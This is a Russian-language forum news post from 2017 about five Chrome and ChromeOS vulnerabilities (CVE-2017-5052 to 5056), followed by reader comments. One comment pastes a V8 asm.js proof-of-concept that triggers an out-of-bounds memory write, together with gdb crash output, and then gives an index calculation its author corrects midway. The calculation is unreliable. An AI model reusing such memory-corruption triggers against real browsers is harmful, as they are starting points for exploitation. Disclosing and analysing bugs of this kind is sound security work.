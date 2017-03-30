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В Chrome и ChromeOS обнаружены уязвимости

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Компания Google сообщила об обновлении стабильного канала браузера Chrome, Chrome для Android и операционной системы ChromeOS, в связи с обнаружением 5 уязвимостей.

Одна из обнаруженных уязвимостей — критическая, и позволяет обойти все уровни защиты браузера и выполнить произвольный код за пределами sandbox-окружения.

Обнаруженные уязвимости в браузере Chrome:

  • CVE-2017-5055 — использование освобождённой памяти, критическая уязвимость в коде печати (Wadih Matar).
  • CVE-2017-5054 — переполнение буфера в JavaScript-движке V8 (Nicolas Trippar из Zimperium zLabs)
  • CVE-2017-5052 — ошибка приведения типов в Blink (JeongHoon Shin)
  • CVE-2017-5056 — использование памяти после освобождения в Blink (аноним)
  • CVE-2017-5053 — доступ к памяти вне границ (Team Sniper (Keen Lab и PC Mgr)

Обнаруженные уязвимости в ChromeOS:

  • CVE-2017-5054 — переполнение буфера в JavaScript-движке V8 (Nicolas Trippar из Zimperium zLabs)
  • CVE-2017-5052 — ошибка приведения типов в Blink (JeongHoon Shin)
  • CVE-2017-5056 — использование памяти после освобождения в Blink (аноним)
  • CVE-2017-5053 — доступ к памяти вне границ (Team Sniper (Keen Lab и PC Mgr)

Обнаруженные уязвимости в браузере Chrome для Android:

  • CVE-2017-5056 — использование памяти после освобождения в Blink (аноним)

Обновления с исправлением уязвимостей будут выпущены в ближайшее время, сообщает Google.

Многие из уязвимостей были найдены при помощи инструментов AddressSanitizer, MemorySanitizer, Control Flow Integrity и libFuzzer.

>>> Подробности

конспираторы херовы, гугл хочет reenter password как будто я его помню, mitra говорит что CVE зарезервирован.

https://bugs.chromium.org/p/chromium/issues/detail?id=658114

REPRODUCTION CASE
--------------------------- poc.js -------------
boom0 = (function(stdlib, foreign, heap){
            "use asm";
            var ff = Math.sign;
            var m32 = new stdlib.Int32Array(heap);
            function f(v)
            {
              m32[((1-ff(NaN) >>> 0) % 0xdc4e153) & v] = 0x12345678;
            }
            return f;
         })(this, {}, new ArrayBuffer(256));
%OptimizeFunctionOnNextCall(boom0);
boom0(0xffffffff)

Program received signal SIGSEGV, Segmentation fault.
0x518627e3 in ?? ()
(gdb) x/i $pc
=> 0x518627e3:  mov    DWORD PTR [eax*4+0xa521b98],0x12345678

лол, какой-то смешной баг. чуваки похоже не осилили проверить что за константа получается.

ckotinko ★★★ ()

А я всегда говорил, что хром - это ШЕРЕТО , к тому же ещё и с зондами... И это линуксоиды? Родина дала им Firefox - бери, пользуйся! Нет, не хочу, хочу дырявый хром

SakuraKun ()
Ответ на: комментарий от anonymous

ну там же движок JS есть.

по идее после оптимизации доступ к массиву должен идти либо с проверкой лимитов, либо без проверки если индекс заранее известен и он меньше лимита.

тут возвращается boom, которая работает с буфером размером 256 и доступом по фиксированному адресу. но походу тут оптимизатор немного по другому считает индексы нежели это происходит в асмокоде.

((1-ff(NaN) >>> 0) это (1-int(NaN)) = 1-0x80000000 = 1+0x7fffffff+1=0x80000001. остаток от деления равен fbebebec.

upd: вру. 1-sign(NaN)=NaN к intу 0x80000000 и будет fbebebeb

но видимо оптимизатор считает как-то по другому и он как-то насчитал в допустимых пределах.

что-то не понимаю, как можно было получить валидный индекс.

ckotinko ★★★ ()
Последнее исправление: ckotinko (всего исправлений: 1)
Безопасность